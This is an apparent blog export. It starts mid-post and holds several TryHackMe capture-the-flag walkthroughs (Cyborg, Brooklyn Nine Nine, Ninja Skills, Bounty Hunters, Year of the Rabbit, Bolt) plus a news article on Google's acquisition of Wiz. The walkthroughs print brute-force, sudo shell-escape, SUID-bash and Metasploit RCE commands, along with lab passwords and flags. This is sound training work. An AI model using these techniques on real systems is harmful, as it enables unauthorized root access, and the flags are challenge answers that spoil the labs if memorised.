field\ncd dev\ncd final_archive\nNext I check Borg archive details:\n─$ borg info .\nEnter passphrase for key /home/kali/Downloads/home/field/dev/final_archive: squidward\nRepository ID: ebb1973fa0114d4ff34180d1e116c913d73ad1968bf375babd0259f74b848d31\nLocation: /home/kali/Downloads/home/field/dev/final_archive\nEncrypted: Yes (repokey BLAKE2b)\nCache: /home/kali/.cache/borg/ebb1973fa0114d4ff34180d1e116c913d73ad1968bf375babd0259f74b848d31\nSecurity dir: /home/kali/.config/borg/security/ebb1973fa0114d4ff34180d1e116c913d73ad1968bf375babd0259f74b848d31\n------------------------------------------------------------------------------\nOriginal size Compressed size Deduplicated size\nAll archives: 1.49 MB 1.49 MB 1.50 MB\nUnique chunks Total chunks\nChunk index: 99 99\n─$ borg list .\nEnter passphrase for key /home/kali/Downloads/home/field/dev/final_archive: squidward\nmusic_archive Tue, 2020-12-29 19:30:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]\nThen we see the archive name and run this to extract and explore it:\n─$ borg extract /home/kali/Downloads/home/field/dev/final_archive/::music_archive\nEnter passphrase for key /home/kali/Downloads/home/field/dev/final_archive: squidward\nls\ncd alex\n─$ ls -la *\nDesktop:\ntotal 12\ndrwxrwxr-x 2 kali kali 4096 Dec 29 2020 .\ndrwxr-xr-x 12 kali kali 4096 Dec 29 2020 ..\n-rw-r--r-- 1 kali kali 71 Dec 29 2020 secret.txt\nDocuments:\ntotal 12\ndrwxrwxr-x 2 kali kali 4096 Dec 29 2020 .\ndrwxr-xr-x 12 kali kali 4096 Dec 29 2020 ..\n-rw-r--r-- 1 kali kali 110 Dec 29 2020 note.txt\nDownloads:\ntotal 8\ndrwxrwxr-x 2 kali kali 4096 Dec 28 2020 .\ndrwxr-xr-x 12 kali kali 4096 Dec 29 2020 ..\nThat shows 2 files:\nDesktop: secret.txt\nDocuments: note.txt → Contains login: alex:S3cretP@s3\nWhich is the username and password for SSH.\nSSH Access\nThen immediately I go on to quickly extract the user.txt with the commands:\nssh alex@10.10.128.43\nls -la\ncd /home/alex\ncat user.txt\nUser.txt 
flag:\nflag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}\nPrivilege Escalation\nCheck sudo permissions:\nsudo -l\nThen we see this:\n(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh\nWe see the file backup.sh can be executed as root, so we start off by entering the directory:\nalex@ubuntu: cd /etc/mp3backups/\nalex@ubuntu:/etc/mp3backups$ cat backup.sh\n#!/bin/bash\nsudo find / -name \"*.mp3\" | sudo tee /etc/mp3backups/backed_up_files.txt\ninput=\"/etc/mp3backups/backed_up_files.txt\"\n#while IFS= read -r line\n#do\n#a=\"/etc/mp3backups/backed_up_files.txt\"\n# b=$(basename $input)\n#echo\n# echo \"$line\"\n#done \u003c \"$input\"\nwhile getopts c: flag\ndo\ncase \"${flag}\" in\nc) command=${OPTARG};;\nesac\ndone\nbackup_files=\"/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3\"\n# Where to backup to.\ndest=\"/etc/mp3backups/\"\n# Create archive filename.\nhostname=$(hostname -s)\narchive_file=\"$hostname-scheduled.tgz\"\n# Print start status message.\necho \"Backing up $backup_files to $dest/$archive_file\"\necho\n# Backup the files using tar.\ntar czf $dest/$archive_file $backup_files\n# Print end status message.\necho\necho \"Backup finished\"\ncmd=$($command)\necho $cmd\nNext I try editing the script (won’t work due to permissions).\nTo tackle this I use echo (a revshell could also be used):\necho 'chmod +s /bin/bash' \u003e\u003e /etc/mp3backups/backup.sh\nThe \u003e\u003e operator appends the echoed text (chmod +s /bin/bash) to the file /etc/mp3backups/backup.sh. 'chmod +s /bin/bash' is a command that sets the SUID (Set User ID) bit on /bin/bash, allowing any user who executes bash to gain the permissions of the file owner. If backup.sh is executed later (e.g., by root via a cron job or another automated process), it 
will run chmod +s /bin/bash. Then:\nsudo /etc/mp3backups/backup.sh\nls\ncd /root\ncat root.txt\nflag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}\nCONCLUSION:\nI hope this writeup walkthrough from my end was helpful to you guys.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well.\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"13 April 2025","externalUrl":null,"permalink":"/writeups/tryhackme/cyborg-thm-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"CYBORG — THM — WRITEUP","type":"writeups"},{"content":" Hello everyone! This is an easy room from the TryHackMe platform called “Brooklyn Nine Nine”. BROOKLYN NINE NINE — THM — WRITEUP\nHello everyone! This is an easy room from the TryHackMe platform called “Brooklyn Nine Nine”.\nThis was one of the easiest rooms and a very fun room for beginners to try out.\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nFirst, we deploy the machine. 
While it’s booting up, go ahead and open your terminal tab and get it ready.\nOnce it is deployed, we start by visiting the webpage.\nThen I inspect the page source (Right-click → Inspect or Ctrl + U).\nI notice a .jpg file mentioned.\nThe hint suggests using steganography, so download the image and then:\nstrings image.jpg\nsteghide extract -sf image.jpg\nBut no luck with this, so I go back to the terminal and run nmap:\nnmap -sV -A -p- 10.10.121.215\nThrough this I find:\nFTP (21) open → Possible anonymous login.\nSSH (22) open → Potential entry point.\nExploiting FTP (Anonymous Login)\nConnect to FTP:\nftp 10.10.121.215\nName: anonymous\nPassword: anonymous\nOnce in:\nls -la\nget note_to_jake.txt\nexit\nNow once out of the ftp:\ncat note_to_jake.txt\nThe note hints the username to ssh is Jake, yet the password is not known.\nThis makes me turn to Hydra:\nhydra -l jake -P /usr/share/wordlists/rockyou.txt ssh://10.10.121.215\nkaboom!\nUsername: jake\nPassword: 987654321\nSSH Access\nNow we login to SSH:\nssh jake@10.10.121.215 -p 22\nOnce in:\nls -la\ncd /home\nls -la\ncd holt\ncat user.txt\nThat leads us to the user.txt flag:\nee11cbb19052e40b07aac0ca060c23ee\nPrivilege Escalation\nNow to gain root access we first use sudo -l:\nsudo -l\nThen it shows this:\nThen we see:\n/bin/less can be run as root.\nSo immediately head to GTFOBins:\nLook up GTFOBins for less (sudo): https://gtfobins.github.io/gtfobins/less/#sudo\nRun less with root privilege:\nsudo less /etc/profile\nActivate a shell within less. Type:\n!/bin/sh\nand press Enter.\nNow type the command:\nwhoami\ncd /root\nls -la\ncat root.txt\nThis leads us to the root.txt flag:\n63a9f0ea7bb98050796b649e85481845\nCONCLUSION:\nI hope this writeup walkthrough from my end was helpful to you guys. It was a quick room and in the end, it was fun to complete.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. 
This being my first writeup, I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"8 April 2025","externalUrl":null,"permalink":"/writeups/tryhackme/brooklyn-nine-nine-thm-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"BROOKLYN NINE NINE — THM — WRITEUP","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Ninja Skills.” NINJA SKILLS — THM — WRITEUP\nHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Ninja Skills.”\nIt focuses on the fundamentals of using basic tools, along with providing an understanding of Linux commands.\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy it! :)\nFirst, we deploy the machine. 
While it’s booting up, go ahead and open your terminal tab and get it ready.\nWe start by using the provided credentials from the TryHackMe (THM) page to log into the machine via SSH:\nssh new-user@10.10.203.236\nThese are the file names given:\nNow once we enter the SSH session using the credentials:\nWe begin by searching for the first file named 8V2L using the find command:\nfind / -name 8V2L 2\u003e/dev/null\nfind is used to search for files and directories in a directory hierarchy.\n/ specifies the root directory; the search will start from the top of the file system and look everywhere.\n2\u003e redirects stderr (error messages) to a location.\n/dev/null is a special file that discards any data written to it.\nHence, any permission errors or other errors will be suppressed and not shown in the output.\nThis reveals the location: /etc/8V2L\nNow, since this challenge involves multiple hidden files, we perform the search by looking for a list of known filenames:\nfind / -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy 2\u003e/dev/null\nThis returns a list of files located in various directories:\n/mnt/D8B3\n/mnt/c4ZX\n/var/FHl1\n/var/log/uqyw\n/opt/PFbD\n/opt/oiMO\n/media/rmfX\n/etc/8V2L\n/etc/ssh/SRSq\n/home/v2Vb\n/X1Uy\nI also notice that the file bny0 is missing.\n1. Which of the above files are owned by the best-group group?\nfind / -type f \\( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \\) -exec ls -la {} \\; 2\u003e/dev/null\nFrom the output, the files owned by best-group are:\n/mnt/D8B3\n/home/v2Vb\n2. 
Which of these files contain an IP address?\ngrep -oE \"[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\" *\ngrep → Search for a pattern in files.\n-o → Show only the matching part (not the whole line).\n-E → Use extended regular expressions (ERE).\n[0-9]{1,3} → Matches a 1 to 3-digit number (POSIX ERE has no \\d shorthand, and wrapping it in [ ] would turn it into a character class, so the digit range is spelled out).\n\\. → Matches a literal dot (.)\nThis reveals that the file oiMO contains an IP address: oiMO: 1.1.1.1\n3. SHA1 Hash of Each File\nTo check the SHA1 hash:\nfind / -type f \\( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \\) -exec sha1sum {} \\; 2\u003e/dev/null\nfind / -type f \\( -name ... \\) → Find the specified files.\n-exec sha1sum {} \\; → For each file, calculate its SHA1 hash.\nsha1sum → Outputs a unique 40-character hash for the file.\n2\u003e/dev/null → Hide error messages.\nThis gives the output:\n2c8de970ff0701c8fd6c55db8a5315e5615a9575 /mnt/D8B3\n9d54da7584015647ba052173b84d45e8007eba94 /mnt/c4ZX\nd5a35473a856ea30bfec5bf67b8b6e1fe96475b3 /var/FHl1\n57226b5f4f1d5ca128f606581d7ca9bd6c45ca13 /var/log/uqyw\n256933c34f1b42522298282ce5df3642be9a2dc9 /opt/PFbD\n5b34294b3caa59c1006854fa0901352bf6476a8c /opt/oiMO\n4ef4c2df08bc60139c29e222f537b6bea7e4d6fa /media/rmfX\n0323e62f06b29ddbbe18f30a89cc123ae479a346 /etc/8V2L\nacbbbce6c56feb7e351f866b806427403b7b103d /etc/ssh/SRSq\n7324353e3cd047b8150e0c95edf12e28be7c55d3 /home/v2Vb\n59840c46fb64a4faeabb37da0744a46967d87e57 /X1Uy\nAnd matching the question we see: c4ZX\n4. Which file contains 230 lines?\nWe use the wc -l command:\nfind / -type f \\( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \\) -exec wc -l {} \\; 2\u003e/dev/null\nfind / -type f \\( -name ... 
\\) → Find the specified files.\n-exec wc -l {} \\; → Count the number of lines (wc -l) in each file.\nThis shows the output:\nSince bny0 is missing, and every other file has 209 lines, I go with the answer of bny0 has 230 lines.\n5. Which file is owned by user ID 502?\nfind / -type f \\( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \\) -exec ls -n {} \\; 2>/dev/null\nls -n → Like ls -la, but shows numeric user/group IDs instead of names.\nfind ... -exec ls -n {} \\; → Find and list ownership details.\nThen, looking at the output, the file owned by user ID 502 is: /X1Uy\n6. Which file is executable by everyone?\nFirst, copy the files into the current directory so they can be listed together with ls -la:\nfind / -type f \\( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \\) -exec cp {} . \\; 2>/dev/null\nTo check executable permissions: ls -la\nrwxrwxr-x → Means read (r), write (w), and execute (x) for:\nOwner: rwx (Read, Write, Execute)\nGroup: rwx (Read, Write, Execute)\nOthers: r-x (Read, Execute, but NOT Write)\n\\( -name 8V2L -o -name bny0 -o -name c4ZX ... \\): The -o (OR) operator means it looks for files with any of these names.\n-exec cp {} . \\;: For each found file, execute the cp (copy) command to copy it into the current directory (.)\nAnd from this output:\nrwxrwxr-x 1 new-user new-user 13545 Oct 23 2019 /etc/8V2L\nThe 8V2L file has execute (x) permissions for everyone {{ /etc/8V2L }}\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all! It was a quick room that gave us a touch on Linux commands.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. 
I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"6 April 2025","externalUrl":null,"permalink":"/writeups/tryhackme/ninja-skills-thm-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"NINJA SKILLS — THM — WRITEUP","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Bounty Hunter.” BOUNTY HUNTERS— THM CTF — WRITEUPHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Bounty Hunter.”\nThis room is classified as easy and is a walkthrough-type challenge. It took me around 15 minutes to complete, and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nOnce it’s up, let’s copy the IP address and connect to the network. 
We encounter a web page with some image and text.\nI initiate an Nmap scan and run a Feroxbuster scan.\nnmap 10.10.182.82 --open -sV -O\nThis reveals:\nFTP (port 21)\nSSH (port 22)\nA web server (port 80)\nferoxbuster -u http://10.10.182.82/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\nThis identifies a directory:\n/images\nThen, navigating to /images, we find an image file: crew.jpg\nI download it and try analyzing the file using strings and steghide:\nstrings crew.jpg\nsteghide extract -sf crew.jpg\nHowever, this does not yield any useful information.\nSince FTP is open, we try logging in with the default anonymous credentials:\nftp 10.10.182.82\nInside the FTP directory, we check for available files:\npwd\nls -la\nAfter some time, this reveals two text files:\ntask.txt\nlocks.txt\nWe retrieve both files:\nget task.txt\nget locks.txt\nexit\nAfter exiting FTP, we read the contents of the files:\ncat task.txt\ncat locks.txt\nThis reveals:\nusername: lin\nA list of possible passwords\nWe copy the password list into a new file:\nnano pass.txt\nUsing Hydra, we attempt an SSH brute-force attack:\nhydra -l lin -P pass.txt ssh://10.10.182.82:22\nHydra successfully finds the SSH credentials:\nUsername: lin\nPassword: RedDr4gonSynd1cat3\nGaining SSH Access\nUsing the obtained credentials, we log into SSH:\nssh lin@10.10.182.82 -p 22\nOnce inside:\npwd\nls -la\ncd /home\ncat user.txt\nUser flag obtained:\nTHM{CR1M3_SyNd1C4T3}\nPrivilege Escalation to Root\nWe check if lin has sudo privileges:\nsudo -l\nThis reveals: (root) /bin/tar\nUsing GTFOBins, we find an entry that allows privilege escalation using tar.\nWe execute the following command to get a root shell:\nsudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh\nOnce inside the root shell, we navigate to the root directory:\npwd\ncd /root\nls -la\ncat root.txt\nRoot flag obtained:\nTHM{80UN7Y_h4cK3r}\nConclusion\nI hope this write-up walkthrough was helpful to you all! 
It was a quick room that gave us a touch on FTP access to retrieve credentials, Brute-force attack on SSH using Hydra and Privilege escalation via misconfigured tar in sudo.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. This being my first writeup, I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r.\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"1 April 2025","externalUrl":null,"permalink":"/writeups/tryhackme/bounty-hunters-thm-ctf-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"BOUNTY HUNTERS— THM CTF — WRITEUP","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Year Of The Rabbit.” YEAR OF THE RABBIT — TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Year Of The Rabbit.”\nThis room is classified as easy and is a walkthrough-type challenge. It took me around 20 minutes to complete, and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nOnce it’s up, let’s copy the IP address and connect to the network. 
We encounter a basic Apache page, which immediately prompts me to initiate an Nmap scan and run a Feroxbuster scan.\nnmap 10.10.124.120 --open -sV -O\nferoxbuster -u http://10.10.124.120/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\nThis reveals:\n3 open ports\nA directory: /assets\nNavigating to /assets, we find files including CSS and a JavaScript file. However, after analysis, the JavaScript file doesn’t seem relevant to exploitation.\nWe continue looking for additional hidden content.\nUsing Burp Suite, we capture and analyze HTTP requests, uncovering a hidden directory. Accessing this directory, we find a PNG file named Hot_Babe.png.\nWe first try extracting hidden data using steghide, but it doesn't yield any result.\nWe use the strings command to analyze the file's contents:\nstrings Hot_Babe.png\nThis reveals a list of potential passwords and the FTP username: ftpuser\nBrute-Forcing FTP Credentials:\nWe copy the extracted passwords into a text file (pass.txt).\nWe run hydra to attempt logging into FTP:\nhydra -l ftpuser -P pass.txt ftp://10.10.124.120\nThis successfully finds the credentials:\nUsername: ftpuser\nPassword: 5iez1wGXKfPKQ\nAccessing FTP and Retrieving Credentials\nWe log into FTP using the obtained credentials:\nftp 10.10.124.120\nInside the FTP server:\nls -la\nget Eli's_Creds.txt\nexit\nWe find a file: Eli's_Creds.txt, download it, and exit FTP.\nWe open the file:\ncat Eli\\'s_Creds.txt\nThe format appears to be Brainfuck cipher. 
Using dCode’s Brainfuck decoder, we decode it to reveal:\nUsername: eli\nPassword: DSpDiM1wAEwid\nGaining SSH Access\nUsing the obtained credentials, we log into SSH:\nssh eli@10.10.124.120 -p 22\nOnce inside:\nls -la\npwd\nLooking for interesting files, we use:\nlocate s3cr3t\ncd /usr/games/s3cr3t\nls -la\ncat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!\nThis reveals another password:\nUsername: gwendoline\nPassword: MniVCQVhQHUNI\nPrivilege Escalation to Gwendoline\nWe switch users:\nsu gwendoline\nNavigating through:\ncd home\ncd gwendoline\nls -la\ncat user.txt\nWe obtain the user flag:\nTHM{1107174691af9ff3681d2b5bdb5740b1589bae53}\nPrivilege Escalation to Root\nChecking sudo privileges:\nsudo -l\nWe see the following:\n(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt\nSince vi can run shell commands from inside the editor, we can spawn a root shell using:\nsudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt\nInside vi, press : and type:\n!/bin/sh\nPress ENTER, and we get a root shell.\nNow, we navigate to the root directory:\ncd /root\nls -la\ncat root.txt\nWe obtain the root flag:\nTHM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161}\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all! It was a quick room that gave us a light touch on web enumeration, FTP brute force, SSH access and privilege escalation.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. 
Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r.\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"30 March 2025","externalUrl":null,"permalink":"/writeups/tryhackme/year-of-the-rabbit-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"YEAR OF THE RABBIT — TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Bolt.” It focuses on the fundamentals of using tools… BOLT — THM CTF — WRITEUPHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Bolt.” It focuses on the fundamentals of using tools, along with an understanding of Metasploit and, specifically, Bolt CMS.\nThis room is classified as easy and is a walkthrough-type challenge. It took me around 10–20 minutes to complete, and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nOnce it’s up, let’s copy the IP address and connect to the network. We encounter a basic Apache page, which immediately prompts me to initiate an Nmap scan and run a Feroxbuster scan.\nnmap -sV -p- 10.10.55.169 --open\n-sV helps us discover the services running on the open ports.\n-p- scans all the ports (because we want to find anything and everything).\n--open ensures we only see the open ports.\nThe scan reveals port 8000 is open, hosting a web service.\nVisiting http://10.10.55.169:8000/ reveals a Bolt CMS instance. 
Now scrolling through, I find hints about a username and a password:\nUsername: bolt\nPassword: boltadmin123\nThen, I attempted to inspect the page and look around for any version, but couldn’t find it.\nTo find the version, I first searched online for how to gain admin access to view the version details.\nThis led me to try /bolt/login, where I then entered the username and password. This got me in, and in the bottom left corner the version was present:\nBolt CMS 3.7.1\nNext, we need to find the ExploitDB entry for the version. Since we know that Bolt CMS 3.7.1 is running, I searched ExploitDB for a known Remote Code Execution (RCE) exploit.\nEDB-ID: 48296\nNext, I turn to Metasploit and run:\nmsfconsole\nThen, I search for the exploit using the command:\nsearch bolt 3.7.1\nAfter running the search, I get the following result on my screen: exploit/unix/webapp/bolt_authenticated_rce\nThen I use these commands in order:\noptions\nuse 0 {selects the first exploit from the search results}\nset lhost 10.4.1.240 {sets LHOST (Local Host), our machine’s IP}\nset rhost 10.10.55.169 {sets RHOST (Remote Host), the target’s IP}\nset username bolt {sets the username for authentication}\nset password boltadmin123 {sets the password for authentication}\nNow we execute:\nrun\nSuccess!\nNow the goal is to locate the flag:\nwhoami {displays the current user you are logged in as}\nls -la {lists all the files in the current directory}\ncd ../ {changes the directory by moving you one level up}\npwd {prints the current working directory}\ncd /home {changes the directory to /home; you could also do cd ../ twice}\nls -la\nThen we see the flag.txt file there and perform cat:\ncat flag.txt {displays the contents of flag.txt}\nTHM{wh0_d035nt_l0ve5_b0l7_r1gh7?}\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all! It was a quick room that gave us a light touch on Metasploit and, honestly, it made me want to watch the Bolt movie again! 
I’m going to watch it now!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. This being my first writeup, I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r.\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"25 March 2025","externalUrl":null,"permalink":"/writeups/tryhackme/bolt-thm-ctf-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"BOLT — THM CTF — WRITEUP","type":"writeups"},{"content":" A few days ago, on March 18th, 2025, the tech world was shaken by an announcement that seemed almost surreal. Breaking headlines flooded the… How Google’s $32 Billion Acquisition of Wiz is Set to Transform Cloud Security with AI\nA few days ago, on March 18th, 2025, the tech world was shaken by an announcement that seemed almost surreal. Breaking headlines flooded the internet: “Google has acquired Wiz”. This news sent ripples through the entire tech industry, particularly in the world of cybersecurity and cloud computing, and I couldn’t help but rush to my laptop to dig into the details.\nThis wasn’t the first time we’d heard of such a deal. A few months ago, a similar acquisition was in the works, pegged at $22 billion. But it fell through, mainly due to regulatory concerns faced by Google. The deal seemed doomed. So, when I saw the headlines again, this time with a $32 billion price tag, I was both surprised and intrigued. What changed? Why is this happening now? What does this mean for the future of cybersecurity and cloud computing?\nThe $32 Billion Deal: Google Acquires Wiz\nOn March 18, 2025, Google officially announced it had signed a definitive agreement to acquire Wiz, a cloud security firm based in New York. 
The deal, valued at $32 billion (subject to closing adjustments), was an all-cash transaction, and once finalized, Wiz will become part of Google Cloud.\nThis acquisition is not only a major financial move for Google but also a strategic one, as Google aims to strengthen its position in the highly competitive cloud security space. As CEO Sundar Pichai mentioned in a March 18 webcast,\n“Security is a fundamental priority for CEOs and government leaders around the world. The security landscape has changed, and the pace and impact of breaches are accelerating. AI brings new risks, but also new opportunities.”\nWiz’s Origins: From Adallom to Cloud Security Powerhouse\nAssaf Rappaport: CEO, Ami Luttwak: CTO, Yinnon Costica: VP Product, Roy Reznik: VP R\u0026D\nBefore founding Wiz, the four Israeli entrepreneurs behind the startup had already achieved success in the tech industry. In 2012, they founded Adallom, a cloud security firm based in Tel Aviv. Adallom was sold to Microsoft three years later for $320 million, at the time setting the record for the most Microsoft had ever paid for an Israeli tech company. The four worked together at Microsoft’s R\u0026D center in Herzliya, where they led Microsoft Azure’s Cloud Security Group.\nHowever, in 2020, as the world shifted toward a remote work environment due to the COVID-19 pandemic, the demand for cloud security solutions surged. The founders saw an opportunity to establish Wiz, creating a solution that secured multi-cloud environments and addressed the rising cybersecurity risks that businesses were facing.\nWiz’s Rapid Growth: A Cloud Security Leader\nWiz quickly gained traction, offering a fast-growing multi-cloud security platform that was powered by AI. With cloud adoption on the rise, businesses sought more robust security solutions, and Wiz was perfectly positioned to meet this demand. 
The company’s customer base now spans over 40% of the Fortune 100 companies, including major players like BMW, Slack, Agoda, and Plaid.\nBy 2024, Wiz was valued at $12 billion, having rapidly grown its annual revenue from $1 million in 2022 to $350 million by the end of 2024. In fact, Wiz’s marketing and growth strategy were so effective that nearly half of the Fortune 500 companies now use their software.\nThe success of Wiz has also earned the company’s founders a spot on Forbes’ list of the world’s richest people, with each of them now worth around $1 billion.\nThe Technology Behind Wiz: Securing the Cloud with AI\nOne of the key differentiators for Wiz is its approach to cloud security. Traditional security platforms require the deployment of individual agents on every device to secure them, a process that can be both time-consuming and resource-intensive. Wiz, on the other hand, uses agentless security, meaning companies don’t need to deploy separate security programs on each device.\nInstead, Wiz connects directly to a cloud environment and uses digital twin technology to create a simulated model of the cloud setup. This model allows security experts to assess potential risks, prioritize them, and respond more effectively.\nAdditionally, Wiz’s user interface makes it easy for businesses to monitor their cloud environments. One tool, for example, displays a web chart showing all the connections in a cloud environment, helping security teams understand how a breach could impact the entire system.\nThis combination of agentless security and digital twin technology is what sets Wiz apart from its competitors and positions it as a leader in the rapidly evolving AI-driven cybersecurity space.\nGoogle’s Strategic Move: What This Acquisition Means for Google Cloud\nPrevious Acquisitions by Google\nThis acquisition is a game-changer for Google Cloud, allowing the company to compete more effectively with major players like Amazon Web Services (AWS) and Microsoft Azure. 
Google Cloud’s revenue was just $43 billion in 2024, significantly lower than AWS’s $105.4 billion and Azure’s $107.6 billion. With the acquisition of Wiz, Google is making a big push to narrow this gap.\nIn addition to the acquisition, Google’s security portfolio includes other important assets such as Mandiant, VirusTotal, and Chronicle (now Google Security Operations). Wiz’s AI-powered security solutions will enhance Google Cloud’s capabilities and position Google as a serious player in the enterprise security market.\nAI and the Future of Cloud Security\nAI plays a pivotal role in cloud security, and Wiz’s technology exemplifies how artificial intelligence can be integrated into cybersecurity platforms. AI helps Wiz identify potential threats faster and more accurately, providing businesses with real-time threat detection and response capabilities.\nHowever, as with any technology, there are risks associated with the use of AI in security. As AI evolves, so do the potential threats, and organizations must remain vigilant to keep up with emerging risks.\nThe growing role of AI in cloud security positions Google and Wiz to lead the next wave of innovation in this space, offering more advanced tools to tackle increasingly sophisticated cyberattacks.\nChallenges and Risks Ahead\nWhile the acquisition of Wiz presents many opportunities, there are also significant risks. One of the key challenges is regulatory scrutiny. Google is already facing antitrust cases, and its acquisition of Wiz could come under the microscope as well. Additionally, Google agreed to a reverse termination fee of $3.2 billion, which is one of the highest of all time, underscoring the high stakes involved.\nMoreover, Wiz is currently involved in a patent infringement lawsuit with Orca, another cloud cybersecurity company. Orca claims that Wiz is using its patented technologies without authorization. 
